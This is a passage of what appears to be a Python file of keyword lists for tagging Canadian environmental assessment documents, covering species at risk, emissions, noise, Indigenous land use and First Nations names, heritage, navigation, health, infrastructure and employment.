Buff-breasted Sandpiper
Tryngites subruficollis
Baird\'s Sparrow
Ammodramus bairdii
Grasshopper Sparrow pratensis subspecies
Ammodramus savannarum pratensis
Savannah Sparrow princeps subspecies
Passerculus sandwichensis princeps
Eastern Wood-pewee
Contopus virens
Coastal Tailed Amphibians
Ascaphus truei
Northern Leopard Frog
Lithobates pipiens
Red-legged Frog
Rana aurora
Coeur d\'Alene Salamander
Plethodon idahoensis
Wandering Salamander
Aneides vagrans
Western Tiger Salamander
Ambystoma mavortium
Great Plains Toad
Anaxyrus cognatus
Western Toad
Anaxyrus boreas
Western Toad
Anaxyrus boreas
Rubber Boa
Charina bottae
Milksnake
Lampropeltis triangulum
Western Yellow-bellied Racer
Coluber constrictor mormon
Prairie Rattlesnake
Crotalus viridis
Eastern Ribbonsnake
Thamnophis sauritus
Five-lined Skink
Plestiodon fasciatus
Prairie Skink
Plestiodon septentrionalis
Western Skink
Plestiodon skiltonianus
Eastern Musk Turtle
Sternotherus odoratus
Eastern Painted Turtle
Chrysemys picta picta
Midland Painted Turtle
Chrysemys picta marginata
Northern Map Turtle
Graptemys geographica
Snapping Turtle
Chelydra serpentina
Western Painted Turtle
Chrysemys picta bellii
Lake Erie Watersnake
Nerodia sipedon insularum
Bigmouth Buffalo
Ictiobus cyprinellus
Channel Darter
Percina copelandi
Dolly Varden
Salvelinus malma malma
Banded Killifish
Fundulus diaphanus
Upper Great Lakes Kiyi
Coregonus kiyi kiyi
Northern Brook Lamprey
Ichthyomyzon fossor
Silver Lamprey
Ichthyomyzon unicuspis
Cutlip Minnow
Exoglossum maxillingua
Grass Pickerel
Esox americanus vermiculatus
River Redhorse
Moxostoma carinatum
Rougheye Rockfish type I
Sebastes sp. type I
Rougheye Rockfish type II
Sebastes sp. type II
Yelloweye Rockfish
Sebastes ruberrimus
Yelloweye Rockfish
Sebastes ruberrimus
Columbia Sculpin
Cottus hubbsi
Deepwater Sculpin
Myoxocephalus thompsonii
Rocky Mountain Sculpin
Cottus sp.
Shorthead Sculpin
Cottus confusus
Bluntnose Sixgill Shark
Hexanchus griseus
Bridle Shiner
Notropis bifrenatus
Giant Threespine Stickleback
Gasterosteus aculeatus
Unarmoured Threespine Stickleback
Gasterosteus aculeatus
Green Sturgeon
Acipenser medirostris
Lake Sturgeon
Acipenser fulvescens
Shortnose Sturgeon
Acipenser brevirostrum
Mountain Sucker
Catostomus platyrhynchus
Spotted Sucker
Minytrema melanops
Northern Sunfish
Lepomis peltastes
Longspine Thornyhead
Sebastolobus altivelis
Tope
Galeorhinus galeus
Blackstripe Topminnow
Fundulus notatus
Bull Trout
Salvelinus confluentus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Warmouth
Lepomis gulosus
Atlantic Wolffish
Anarhichas lupus
Brook Floater
Alasmidonta varicosa
Warty Jumping-slug
Hemphillia glandulosa
Haida Gwaii Slug
Staala gwaii
Pygmy Slug
Kootenaia burkei
Sheathed Slug
Zacoleus idahoensis
Threaded Vertigo
Nearctula sp.
Magnum Mantleslug
Magnipelta mycophaga
Wavy-rayed Lampmussel
Lampsilis fasciola
Yellow Lampmussel
Lampsilis cariosa
Mapleleaf
Quadrula quadrula
Rocky Mountain Ridged Mussel
Gonidea angulata
Olympia Oyster
Ostrea lurida
Eastern Pondmussel
Ligumia nasuta
Rainbow
Villosa iris
Yellow-banded Bumble Bee
Bombus terricola
Vivid Dancer
Argia vivida
Greenish-white Grasshopper
Hypochlora alba
Red-tailed Leafhopper
Aflexia rubranura
Red-tailed Leafhopper
Aflexia rubranura
Mormon Metalmark
Apodemia mormo
Monarch
Danaus plexippus
Pale Yellow Dune Moth
Copablepharon grandis
Sonora Skipper
Polites sonora
Pygmy Snaketail
Ophiogomphus howei
Georgia Basin Bog Spider
Gnaphosa snohomish
Dune Tachinid Fly
Germaria angustata
Weidemeyer\'s Admiral
Limenitis weidemeyerii
Blue Ash
Fraxinus quadrangulata
Crooked-stem Aster
Symphyotrichum prenanthoides
Nahanni Aster
Symphyotrichum nahanniense
White-top Aster
Sericocarpus rigidus
Vancouver Island Beggarticks
Bidens amplissima
Western Blue Flag
Iris missouriensis
Buffalograss
Bouteloua dactyloides
American Hart\'s-tongue Fern
Asplenium scolopendrium
Coastal Wood Fern
Dryopteris arguta
Goldencrest
Lophiola aurea
Houghton\'s Goldenrod
Solidago houghtonii
Riddell\'s Goldenrod
Solidago riddellii
Mackenzie Hairgrass
Deschampsia mackenzieana
Common Hoptree
Ptelea trifoliata
Tuberous Indian-plantain
Arnoglossum plantagineum
Dwarf Lake Iris
Iris lacustris
Eastern Lilaeopsis
Lilaeopsis chinensis
Lyall\'s Mariposa Lily
Calochortus lyallii
Fernald\'s Milk-vetch
Astragalus robbinsii var. fernaldii
Water Pennywort
Hydrocotyle umbellata
Beach Pinweed
Lechea maritima
Yukon Podistera
Podistera yukonensis
Hill\'s Pondweed
Potamogeton hillii
Hairy Prairie-clover
Dalea villosa
Prototype Quillwort
Isoetes prototypus
Redroot
Lachnanthes caroliniana
Climbing Prairie Rose
Rosa setigera
Swamp Rose-mallow
Hibiscus moscheutos
New Jersey Rush
Juncus caesariensis
Spiked Saxifrage
Micranthes spicata
Baikal Sedge
Carex sabulosa
Tubercled Spike-rush
Eleocharis tuberculosa
Floccose Tansy
Tanacetum huronense var. floccosum
Pitcher\'s Thistle
Cirsium pitcheri
Athabasca Thrift
Armeria maritima interior
Victorin\'s Water-hemlock
Cicuta maculata var. victorinii
Yukon Wild Buckwheat
Eriogonum flavum var. aquilinum
Felt-leaf Willow
Salix silicicola
Sand-dune Short-capsuled Willow
Salix brachycarpa var. psammophila
Turnor\'s Willow
Salix turnorii
Dwarf Woolly-heads
Psilocarphus brevissimus
Large-headed Woolly Yarrow
Achillea millefolium var. megacephalum
Banded Mosses
Cord-moss
Entosthodon fascicularis
Columbian Carpet Moss
Bryoerythrophyllum columbianum
Twisted Oak Moss
Syntrichia laevipila
Tiny Tassel
Crossidium seriatum
Frosted Lichens
Glass-whiskers
Sclerophora peronella
Flooded Jellyskin
Leptogium rivulare
Blue Felt Lichen
Degelia plumbea
Boreal Felt Lichen
Erioderma pedicallatum
Cryptic Paw Lichen
Nephroma occultum
Oldgrowth Specklebelly Lichen
Pseudocyphellaria rainierensis
Peacock Vinyl Lichen
Leptogium polycarpum
Mountain Crab-eye
Acroscyphus sphaerophoroides
Western Waterfan
Peltigera gowardii"""
Air_emissions = """Air Emissions
Air
CAC
criteria air contaminant
Emissions
Construction equipment
vehicular emissions
CCME
Volatile organic compounds
Combustion
Leak
Fugitive emissions
Flaring
Incinerating
Averaging Period
incineration
Smoke
Venting
Pollute
pollutant
National Pollutant Release Inventory
Exceedance
Release
Ambient
Hydrogen sulphide
H2S
particulate
so2
sulfur dioxide
mercaptans
dust
NO2
ozone
nitrogen dioxide
oxides of nitrogen
NOX
Clean Air Act
concentration
groundlevel
ground-level
gm3
receptor"""
Greenhouse_gas_emissions = """GHG Emissions and Climate Change
greenhouse
greenhouse gas
green house gas
greenhouse gases
climate change
point source
area source
release
leak
burning
assumption
offset
off-set
International Standards Organization
ISO
ghg
ozone
global warming
Assessment of Upstream GHG Emissions
upstream
quantitative
throughput
net zero
net-zero
Environment and Climate Change Canada (ECCC)
Threshold
CO2
Carbon dioxide
CO2 equivalent
Methane
ch4
steam
hydrogen
combustion
fugitive
venting
flaring"""
Noise = """Acoustic Environment
Sound
Noise
Equipment
Frequency
Inaudible
Audible
Decibel
Notification
Noise control
Noise management
loud
quiet
db
acoustic
construction traffic
blasting
machinery
gas plant
compression station"""
Environmental_Obligations = """Environmental Obligations
MBCA
migratory birds convention act
SARA
Species at risk act
DFO
Fisheries and Oceans Canada
Federal Wetland Policy
Hinder
Federal
Provincial
Territorial
International
Policy
Plan
Framework
law
legislation
regulatory
regulations
Federal Wetland Policy"""
Indigenous_land_water_and_air_use = """Traditional Land and Resource Use
TLRU
traditional
Traditional ecological knowledge
Traditional Knowledge
Indigenous Knowledge
Aboriginal Knowledge
Aboriginal
Native
Indian
First Peoples
Treaty Lands
Indigenous Land
Traditional Territory
Oral Indigenous Knowledge
settlement area
IK
OIK
TK
access to lands
access to resources
Hunt
hunting
fishing
Harvest
harvesting
Culturally significant
Culturally modified tree
Gather
Berries
Medicine
Berry picking
Indigenous
Elder
Knowledge Keeper
Trapping
trap
Ceremony
ceremonies
Medicinal
Cultural
Old growth
Spirit Bear
Spirit animal
spiritual
sacred area
sacred sites
metis
Métis
first nations
shxw’ōwhámel
lheidlit’enneh
whispering pines first nation
inuit
elders
kumik elder lodge
tribal
Abenaki
Innu
Montagnais-Naskapi
Oneida
Ahousaht
Interior Salish
Onondaga
Algonquin
Inuinnait
Copper Inuit
Pacheenaht
Assiniboine
Inuvialuit
Mackenzie Inuit
Petun
Atikamekw
Kainai
Piikani
Peigan
Baffin Island Inuit
K'asho Got'ine
Saldermiut Inuit
Beothuk
Kaska Dena
Sahtu Got'ine
Bearlake
Blackfoot Confederacy
Blackfoot
Kivallirmiut
Caribou Inuit
Secwepemc
Shuswap
Cayuga
Ktunaxa
Kootenay
Sekani
Central Coast Salish
Kwakwaka'wakw
Kwakiutl
Seneca
Coast Salish
Kyuquot and Checleseht
Shuta Got'ine
Cree
Labradormiut
Labrador Inuit
Siksika
Dakota
Lilwat
Lillooet
Slavey
Dakelh
Lingit
Tlingit
Stoney-Nakoda
Dane-zaa
Beaver
Syilx
Okanagan
Dene
Mi'kmaq
Tagish
Denesuline
Chipewyan
Mohawk
Tahltan
Ditidaht
Mowachaht-Muchalaht
Tla-o-qui-aht
Clayoquot
Ehattesaht
Nahani
Tlicho
Dogrib
Gitxsan
Gitksan
Netsilingmiut
Netsilik Inuit
Toquaht
Gwich'in
Neutral Confederacy
Tr'ondëk Hwëch'in (Han)
Haida
Nicola-Similkameen
Tseshaht
Sheshaht
Haisla
Kitamaat
Nisga'a
Tsilhqot'in
Chilcotin
Haudenosaunee
Six Nations
Iroquois
Nlaka'pamux
Thompson
Tsimshian
Heiltsuk
Northern Georgia Strait Coast Salish
Tsuut'ina
Sarcee
Hesquiaht
Nuchatlaht
Tutchone
Hupacasath
Opetchesaht
Nunavimmiut
Ungava Inuit
Uchucklesaht
Huu-ay-aht
Nuu-chah-nulth
Ucluelet
Huron-Wendat
Nuxalk
Bella Coola
Wolastoqiyik
Maliseet
Iglulingmuit
Iglulik Inuit
Odawa
Wetal
Tsetsaut
Inuit
Ojibwa
Yellowknives
popkum first nation
leq’á:mel first nation
alexander first nation
samson cree first nation
o’chiese first nation
ermineskin cree nation
enoch cree nation
indian
eskimo
Crown land
?Akisq'nuk
?Esdilagh
'Namgis
Aamjiwnaang
Fort Liard
Adams Lake
Ahousaht
Ahtahkakoop
&Abrevethélets
Aklavik
Tobacco Plains
Ahkwesáhsne Kanien'kehá:ka
Alderville
Alexander
Alexis Nakota Sioux
Tsi Del Del
Alkali Lake
Anaham
Anderson Lake
Animbiigoo Zaagi'igan Anishinaabek
Big Island
Anishinabe of Wauzhushk Onigum
St. Mary's
Ikpiarjuk
Tsiigehtchic
Aseniwuche Winewak
Ashcroft
Athabasca Chipewyan
Whitefish Lake
Attawapiskat
Aundeck-Omni-Kaning
Grise Fiord
Awaetlala
Peerless Trout
Barren Lands
Batchewana
Beardy's and Okemasis'
Bearskin Lake
Beausoleil
Beaver
Beaver Lake
Scia'new
Fort Norman
Behdzi Ahda"
Heíltsuk
Nuxalk
Big Cove
Joseph Bighead Cree
Big River
Bigstone Cree
Birch Narrows
Birdtail Sioux
Walpole Island
Stony Rapids
Little Black River
Marcel Colomb
Blood
Bloodvein
Blueberry River
Montana Cree
St'uxtews
Boothroyd
Boston Bar
Bridge River
Brokenhead Ojibway
Wet'suwet'en
Qikiqtarjuaq
Brunwick House
Tjipogtotjg
Buffalo Point
Buffalo River Dene
Oxford House
Burns Lake
Burnt Church
Tsleil Waututh
Calling Lake
Cambridge Bay
Wei Wai Kum
Stswecem'c/Xgat'tem
Canoe Lake Cree
Canupawakpa Dakota
Kinngait
Cape Mudge
Carcross/Tagish
Ceg-a-Kin
Cayoose Creek
Ch'iyáqtel
Chacachas
Chakastaypasin
Seton Lake
Champagne and Aishihik
Chawathil
Cheam
Chehalis
Chemainus
Chemawawin Cree
Cheslatta Carrier
Big Bear
Janvier
Chisasibi
Tla-o-qui-aht
Clearwater River Dene
Clyde River
Cold Lake
Coldwater
Comox
Constance Lake
Cook's Ferry
Cote
Cowessess
Cowichan
O-Chi-Chak-Ko-Sipi
Mikisew Cree
Cross Lake
Cumberland House
Dakota Plains Wahpeton
Dakota Tipi
Dauphin River
Day Star
Daylu Dena Council
Skeetchestn
Dease River
Dechi Laot'i
Deh Gah Gotie Dene
Fort Franklin
Dene Tha'
Fort Resolution
Nitinaht
Tli Cho
Doig River
Douglas
Driftpile
Duncan's
Dzawada'enuxw
Ebb and Flow
Natoaganeg
Ehattesaht
Kesyehot'ine
Enoch
Ermineskin Cree
Esdilah
Esquimalt
Fairford
Fisher River Cree
Fishing lake
Flying Dust
Fond du Lac Denesuline
Fort Churchill
Fort Folly
Fort Good Hope
Fort Albany
Fort Alexander
Smith's Landing
Fort George
Fort MacKay
Fort McMurray
Fort McPherson
Fort Nelson
Fort Rupert Band
Liidlii Kue
Fort Smith
Fort Ware
Xaxl'ip
Fox Lake Cree
Nadleh Whut'en
Frog Lake
Gamblers
Rae Lakes
Garden Hill
Gesgapegiag
Gingolx
Gitanmaax
Kitwancool
Gitg'a'ata
Kitkatla
New Aiyansh
Gitsegukla
Kitselas
Gitwangak
Gitwinksihlkw
Gitxsan
Glen Vowell
God's Lake
Manto Sipi
George Gordon
Grand Rapids
Grouard
Gwa'Sala-Nakwaxda'xw
Gwawaenuk
Hagwilget
Haisla
Halalt
Halfway River
Hatchet Lake
Hay River
Heart Lake
Hesquiaht
Tenlenaitmux
Wanipigow
Holman
Homalco
Horse Lake
Hupacasath
Huu-ay-aht
Iglulik
Indian Birch
Indian Island
Inuvik
Iqaluit
Iskut
Ministikwan
Kinonjeoshtegon
James Smith
Jean Marie River
Muskoday
K'ómoks
Ka'a'gee Tu
Ka:'yu:'k't'h'/Che:k:tles7et'h'
Kahkewistahaw
Kahnawà:ke
Kamloops
Kanaka Bar
Kanehsatà:ke
Rankin Inlet
Kaska Nation
Katzie
Poor Man or Lean Man
Keeseekoose
Riding Mountain Band
Kehewin Cree
Kelly Lake
Kelly Lake Cree
Kelly Lake Métis Settlement
Lake Harbour
Kinistin
Kispiox
Kitasoo/Xai'Xais
Kitsumkalum
Klahoose
Kluane
Kluskus
Kwanlin Dun
Kwantlen
Kwaw-Kwaw-Apilt
Kwiakah
Kwicksutaineuk-ah-kwaw-ah-mish
Kwikwetlem
Lac La Martre
Lac La Ronge
Leq'á:mel
Lakalzap
Lake Babine
Lake Cowichan
Lake Manitoba
Lake St. Martin
Lax-Kw'alaams
Lean Man
Lekwungen
Lhtakot'en
Liard
Mount Currie
T'it'q'et
Restigouche
Little Black Bear
Little Grand Rapids
Little Pine
Little Red River Cree
Little Salmon Carmacks
Little Saskatchewan
Skwlax
Long Plain
Loon River
Louis Bull
Yaqan Nukiy
Lower Nicola
Lower Similkameen
Lubicon Lake
Lucky Man
Snowdrift
Lyackson
Lytton
Madawaska Maliseet
Makwa Sahgaiehcan
Malahat
Maliseet
Mamalilikulla-Qwe'Qwa'Sot'Em
Manawan
Mathias Colomb
Matsqui
McLeod Lake
Metlakatla
Miawpukek Mi'kamawey Mawi'omi
La Nation Micmac de Gespeg
Mistawasis
Mittimatalik
Mississaugas of the New Credit
Kenhtë:ke Kanyen'keh·:ka
Montreal Lake Cree
Moose Lake
Moosomin
Moricetown
Mosquito, Grizzly Bear's Head, Lean Man
Mowachaht/Muchalaht
Muscowpetung
Utshimassit
Muskeg Lake
Muskowekwan
Musqueam
N'ahadehe
Na-Cho Nyak Dun
Nak'azdli
Nanoose
Nazko
Nee Tahi Buhn
Nekaneet
Xeni Gwet'in
Nisichawayasihk
Neskonlith
Nicomen
Nisga'a Nation
Nooaitch
Northlands Denesuline
Northwest Angle No. 33
Northwest Angle 37
Simpcw
Norway House
Nuchatlaht
Nunavut
Nuwitti
Nut Lake
Oak Lake
O'Chiese
Sioux Valley Dakota
Ocean Man
Ochapowace
Opitciwan
Odanak
Ohamil
Okanagan
Okanese
Old Masset Village Council
Willow Crees
Onion Lake
Opaskwayak Cree
O-Pipon-Na-Piwin Cree
Oregon Jack Creek
Oromocto
Osoyoos
Oujé Bougoumou Cree
Oweekeno
Pacheedaht
Pangnirtung
Pasqua
Pauingassi
Paul
Paulatuk
Pauquachin
Ts'kw'aylaxw
Peepeekisis
Peguis
Pehdzeh Ki
Selkirk
Peigan
Pelican Lake
Penelakut
Penticton
Peter Ballantyne
Peter Chapman
Peters
Pheasant Rump Nakota
Piapot
Algonquins of Pikwákanagán
Pine Creek
Piyesiw-awasis
Popkum
Poplar River
Poundmaker
Prophet River Band, Dene Tsaa Tse K'Nai
Qalipu Mi'Kmaq
Qausuittuq
Qayqayt
Qualicum
Quatsino
Rat Portage
Red Earth
Red Pheasant
Red Sucker Lake
Rolling River
Roseau River Anishinabe
Ross River
Sachs Harbour
Saddle Lake Cree
Saik'uz
Sakimay
Samahquam
Sambaah Ke Dene
Samson
Sandy Bay
Sapotaweyak
Saulteau
Saulteaux
Sawridge
Scowlitz
Seabird Island
Shishálh
Semiahmoo
Secwepemc
Shackan
Shamattawa
Shoal Lake
Shxwhá:y Village
Sîkîp Sâkahikan
Siksika
Sinixt
Siska
Six Nations
Skatin
Skawahlook
Skidegate
Skin Tyee
Skulkayn
Skownan
Skuppah
Skwah
Tla'Amin
Snuneymuxw
Soda Creek
Soowahlie
Splatsin
Tataskweyak Cree
Spuzzum
Squamish
Squiala
St. Theresa Point
Standing Buffalo Dakota
Star Blanket
Stellat'en
Yunesit'in
Stoney Nakoda
Stony Knoll
Sturgeon Lake
Sturgeon Lake Cree
Sucker Creek, AB
Sucker Creek, ON
T'exelc
Semá:th
Sunchild
Swan Lake
Swan River
Sweetgrass
Ta'an Kwäch'än
Tahltan
Takla Lake
Taku River Tlingit
Tallcree
Teetl'itzheh
Teslin Tlingit
The Key
Tl'azt'en
Tl'esqox
Tli Cho Government
Turner Island
Tobique
Valley River
Toquaht
T'Sou-ke
Tr'on dëk Hwëch'in
Ts'ueh Nda
Tsartlip
Tsawout
Tsawwassen
Tsay Keh Dene
Tseshaht
Tseycum
Tsuu T'ina
Tuktoyaktuk
Uchucklesaht
Ucluelet
Ulkatcho
Union Bar
Upper Nicola
Upper Similkameen
Vuntut Gwitchin
Wahpeton Dakota
War Lake
Wasagamack
Waswanipi Cree
Waywayseecappo
Wemotaci
Nation Huronne Wendat
Westbank
West Moberly
Wet'suwet'en Nation
Whispering Pines/Clinton
White Bear
White River
Whitecap Dakota
Atikameg
Witchekan Lake
Wolastokwik NeGoot-Gook
Wôlinak
Wood Mountain Lakota
Woodland Cree
Wrigley
Yeqwyeqwí:ws
Yale
Yekooche
Yellowknives Dene
York Factory
Columbia Lake
Alexandria
Chippewas of Sarnia
Acho Dene Koe
Sexqeltqin
Aitchelitz
Akun'kunik'
Akwesasne
Redstone Band
Esketemc
Tl'etinqox-t'in
N'quatqua
Lake Nipigon Ojibway
Anishinaabeg of Naongashiing
Aqam
Arctic Bay
Arctic Red River
Grande Cache
Atikameksheng Anishnawbek
Sucker Creek
Ausuittuq
Da'naxda'xw
Bald Hill
Beardy's and Okemasis
Beaver Lake Cree
Beecher Bay
Tulita Dene
Bella Bella
Bella Coola
Elsipogtog
Naongashiing
Big Island Lake
Turnor Lake
Bkejwanong
Black Lake Denesuliné
Makadewaagamijiwanong
Black Sturgeon
Kainai
Bobtail
Bonaparte
Nxwisten
Broman Lake
Broughton Island
Buctouche
Bunibonibee
Ts'il kaz koh
Esgenoopetitj
Burrard
Jean Baptiste Gambler
Ikaluktutiak
Campbell River
Canoe Creek
Cape Dorset
We Wai Kai
Carry the Kettle Nakota
Sekw'el'was
Ch'yaqtel
Tsal'alh
Chi:yo:m
Sts'Ailes
Stz'uminus
Chemawawin
Chief Big Bear
Chipewyan Prairie
Clayoquot
Kangiqtugaapik
Crane River
Cree Chip
Pimicikamak
Waskahikanihk Cree Cree
Lower Post
Deadman's Creek
Wekwèti
Fort Providence
Déline
Deninu K'ue
Ditidaht
Dog Rib Rae
Xa'xtsa
Tsawataineuk
Eel Ground
English River
Ermineskin
Pinaymootang
Fisher River
Sayisi Dene
K'asho Got'ine
Sagkeeng
Fort Fitzgerald Dene
Lheidli T'enneh
Kwawkewlth
Fort Simpson
Salt River 195
Kwadacha
Fountain
Fox Lake
Fraser Lake
Gamèti
Gitanyow
Hartley Bay
Gitkxaala
Gitlakdamix
Gits'ilaasu
God's Lake Narrows
Manto Sipi Cree
Goodfish
Misipawistik Cree
Kapawe'no
Kitamaat
K'atlodeeche
High Bar
Hollow Water
Uluqsaqtuuq
Xwémalhkwu
Ohiaht
Wuskwi Sipihk
Island Lake
Jackhead
Tthe'k'ehdeli
John Smith
Comoks
Kakisa
Kyuquot
Tk'emlúps
Kangiqliniq
Kawacatoose
Keeseekoowenin
Kimmirut
Lhoosk'uz Dene
Kwikwasut'inuxw Haxwa'mis
Wha Ti
Lakahahmen
Laxgalt'Sap
Nat'oot'en
Lapatack Cree
Kawacatoose or Mosquito, Grizzly Bear's Head, Lean Man
Songhees
Red Bluff
Lil'wat
Lillooet
Listuguj
Little Shuswap Lake
Lower Kootenay
Lù'an Män Ku Dän
Lutsel K'e Dene
Maliseet of Viger
Manouane
Mathias Colomb Cree
Tsek'hene
Purtujuq
Mohawks of the Bay of Quinte
Montreal Lake
Mosakahiken
Witset
Mushuau Innu
Petequakey
Nahanni Butte
Nak'azdli Whut'en
Snaw-naw-as
Nemaiah
Nelson House
Northlands
Northwest Angle 33
Northwest Angle No. 37
North Thompson
Norway House Cree
Tlatlasikwala
Yellow Quill
Oak River
Obedjiwan
Shxw'ow'hamel
One Arrow
The Pas
O-Pipon-Na-Piwin
Oujé Bougoumou
Wuikinuvx
Pacheenaht
Panniqtuuq
Pavillion
Pelly Band
Piikani
Peter Ballantyne Cree
Skw'atels
Golden Lake
Thunderchild
Poor Man
Prophet River
Resolute Bay
Onihcikiskowapowin
Stony Creek
Zagime Anishinabek
Trout Lake
White Mud River
Sapotaweyak Cree
Sq'éwlets
Sechelt
Waterhen Lake
Sq'ewá:lxw
Sq'ewq&emacryl
Water Hen
Sliammon
Xatsu'll/Cm'etem
Spallumcheen
Tataskweyak
Stone
Young Chipeeweyan
Sukwekwin
Sumas
Tetlit Gwich'in
Toosey
Tlowitsis-mumtagila
Tootinaowaziibeeng
T'Souke
West Point
Tyendinaga
Weymontachi
Whitefish
Yakweakwioose
Akisq'nuk
Alexis Creek
Gwichya Gwich'in
Atikameksheng Anishnawbek
Tanakteuk
Kapuskwatinak
Begaee Shuhagot'ine
Black River
Xwísten
Tzeachten
Chalath
Waskahikanihk Cree
Poplar House People
Kwakiutl
God's River
Misipawistik
Ulukhaktok
Ministikwan Lake Cree
Mosquito
Pukatawagan
Pond Inlet
Mosakahiken Cree
Necoslie
Whitefish Bay
South Indian Lake
Pikwàkanagàn
Dene Tsaa Tse K'Nai
Saddle Lake
Shoal River
Skowkale
Split Lake
Williams Lake
Tlowitsis
Whitefish Lake, AB
Whitefish Lake (Atikameg)
Peerless Lake
Grizzly Bear's Head
Animakhee Wazhing
Whitefish Lake, ON"""
Electricity_and_electromagnetism = """Electromagnetism and Corona Discharge
electromagnetism
voltage
ozone concentration
eletric
electricity
magnetic
magnetism
corona
discharge
magnetic
power line
powerline
electromagnetic
signals
maximum load
induction
frequency
inteference
radio interference
television interference
foul weather
ambient conditions
240 kV"""
Proximity_to_people = """Human Occupancy and Resource Use
Proximity to people
residents
human Occupancy
resource use
consultation
livestock
human
male
female
men
women
boy
girl
father
mother
gender
rural
urban
residential
reserve
crops
orchards
orchid
vineyards
agriculture
recreation
park
scenic
parks canada
conservation area
international biological program
ecological reserves
preserves
industrial
commercial
agreement forests
timber sales area
controlled forest
managed forest
registered hunting
recognized hunting
trapping
guiding areas
commercial fishing
sport finishing
water reserves
water licenses
water supply
municipal
infrastructure
rail
navigable waterways
TLU Impact assessment"""
Archaeological_paleontological_historical_and_culturally_significant_sites_and_resources = """Heritage Resources
Heritage Resources
Heritage
Archaeology
Archeology
Archaeological
Archeological
Paleontology
Paleontological
Historic
Historic resource
Historic site
Hunting camp
Trail
Culturally significant
grading
trenching
excavating
drilling
clearing of vegetation
Dig site
Archaeologist
Archeologist
undiscovered
architectural
grave site
burial site
medicine wheel
culturally modified tree
CMT
archaeological report
archeological report
archaeological assessment
archeological assessment
pre-contact
post-contact
human remains
Heritage Conservation Branch
Ontario ministry of tourism culture and sport
Heritage resources act
Alberta Ministry of Culture Multiculturalism and Status of Women
British Columbia Archeology Branch
Heritage conservation act
Historic sites and monuments act
Historic resources act
Heritage property act
Haida Gwaii Reconciliation act
Heritage Manitoba act
Onatario Heritage act
Loi sur les biens culturels
Heritage place protection act
Archeological sites protection act
richesse du patrimoine
permis de recherche archéologique
Heritage resources impact assessment
HRIA
Acheological impact assessment
AIA
Nunavut territorial lands use regulations
Northwest territories historical advisory Board
Yukon heritage resources Board
oldforest
old forest"""
Human_access_to_boats_and_waterways = """Navigation and Navigation Safety
Navigation
Nonnavigable
Navigation protection activities
Guide lines
Guide wires
Signage
Waterway
Crossing
crossing plan
impacting Navigation
dewatering of navigable waters
navigable waters
navigable waterway
navigable
navigate
watercourse
watercourse crossing
water crossing
crossing methodology
horizontal directional drilling
HDD
bridge
marine
marine terminal
waterway user
recreational waterway user
navigational use
tributary
tourism
tourist
guide outfitter
outfitter
angler
canoe
kayak
boat
sailing
sail
Fisheries and Oceans Canada
Navigation Protection Act
navigable watercourse
navigation Safety
scheduled waters
non-scheduled waters
recreation-related navigation
commercial-related navigation
watercourse users
waterway users
watercourse Crossing
crossing method
trenchless crossing
trenched crossing
navigation hazard
exposed instream
buoyancy issues
upstream
downstream
warning signs
warning Signage
instream
temporary vehicle crossing
bed
banks
preconstruction contours
hydraulic characteristics
erosion and sediment control
runoff
temporary crossing structure
fording
streambank
streambed
side containment"""
Impact_to_social_and_cultural_well_being = """Social and Cultural Well-Being
Social
Routing
socio-cultural
cultural
well-being
well being
families
workers
residents
community
traditions
alcohol
drugs
substance abuse
stresses
household cohesion
illegal
disruptive activities
privacy
inhabited
human behaviour
human behavior
workforce
peak workforce
mobile workforce
discipline measures
traffic control management
project schedule
Code of conduct policy
alcohol and drug policy
Indigenous service providers
regional service providers
social service
cultural service
social agency
cultural agency
cultrual groups"""
Impact_to_human_health_and_viewscapes = """Human Health and Aesthetics
viewscapes
toxic
human health
nuisances
health
death
illness
disease
Aesthetics
human receptors
CCME Guidelines
AER Directive 038
AUC Rule 012
release assessment
exposure assessment
dose-response
risk characterization
mental
Social
well-being
well being
stressors
emotional
public Safety
accidents
visual
obstruction of view
view points
angle of vision
quality of life
environmental changes
adverse human health effects
human receptors
air emissions
noise emissions
effluent discharge
CCME Guidelines
AER Directive 038
AUC Rule 012
risk assessment
ambient conditions
distance to edge of right-of-way
distance to edge of row
distance to schools
susceptible groups
elderly
children
recreationalists
Indigenous Women
visual impact assessment
visually absorb
landscape features
view obstruction
Health canada
human health impact assessment
Canadian handbook on health impact assessment
health indicator data
statistics canada
mortality
beauty
odour"""
Social_cultural_economic_infrastructure_and_services = """Infrastructure and Services
Infractructure
Services
Hospital
Urgent Care
ambulance
Fire services
Fire response
protective services
police services
Emergency response time
Emergency response
Hotel
Motel
RCMP
Royal Canadian Mounted police
medical response personnel
healthcare
social services
Local commercial accommodation
local accommodation
existing accommodation
worker accommodation
campground
Recreational Camp sites
recreational Resources
camp sites
Municipal waste
Municipal wateruse
Municipal water use
waste
contingency plan
traffic control
multi-passenger vehicles
restrict access
service providers
chemical waste
solid waste
liquid waste
landfills
industrial waste
non-hazardous waste
transfer stations
hazardous waste facilities
wastewater treatment facilities
recycling facilities
highways
roads
airports
bridge
911 dispatch services
Local commercial accommodation
Camp sites
Recreational Camp sites
railway
rail
roadway
road
highway
traffic
traffic flow
traffic usage levels
traffic patterns
pipeline
water main
water supply
sewage line
waste water
waste disposal
navigable waterway
powerline
power line
existing
pre-existing
preexisting
local services
regional services
services
accommodation
camping
facilities
recreation
recreational
ammenities
community services
essential services
emergency services
health care services
social services
police
fire
fire fighting
fire-fighting
firefighting
EMT
response time
healthcare
health care
hospital
housing
educational facilities
school
university
college
transportation
access
construction access
land access
right of way
right-of-way
ROW
temporary workspace
temporary work space
TWS
sewer
disposal
electricity
traffic usage
railways
availability of housing
local residents
heavy load vehicles
construction access permits
hotel
big box stores
town centre
property
motel
construction
increased demand"""
Economic_Offsets_and_Impact = """Employment and Economy
Employment opportunities
Business opportunities
contracting opportunities
Project contracting
local contracting
subcontracting
Indigenous employment
Aboriginal employment
Aboriginal participation plan
Indigenous participation plan
Aboriginal businesses
Indigenous businesses
direct employment
prime contractor
local Business
local Economy
local economies
unemployment rate
employment rate
educational level
post-secondary
high school
high-school
college
cegep
diploma
degree
university
non-university
bachelor
certificate
Economy
wage
tips
commission
dividend
pension
child support payment
spousal support payment
jobs
monetary
salary
cash
personnel
cotractors
workers
workforce
staff
labour force
labor force
economic well-being
procurement
tax
revenue
Major industries
Primary industries
Key industrial sectors
tourism
mining
quarrying
oil and Gas
gas extraction
agriculture
forestry
fishing
hunting
construction
public administration
retail trade
temporary workforce
permanent workforce
permanent part-time Employment
permanent full-time Employment
temporary part-time Employment
temporary full-time Employment
self-employment
retirement
investment
contracting
contract
procurement
ordering
training
training programs
education
opportunity
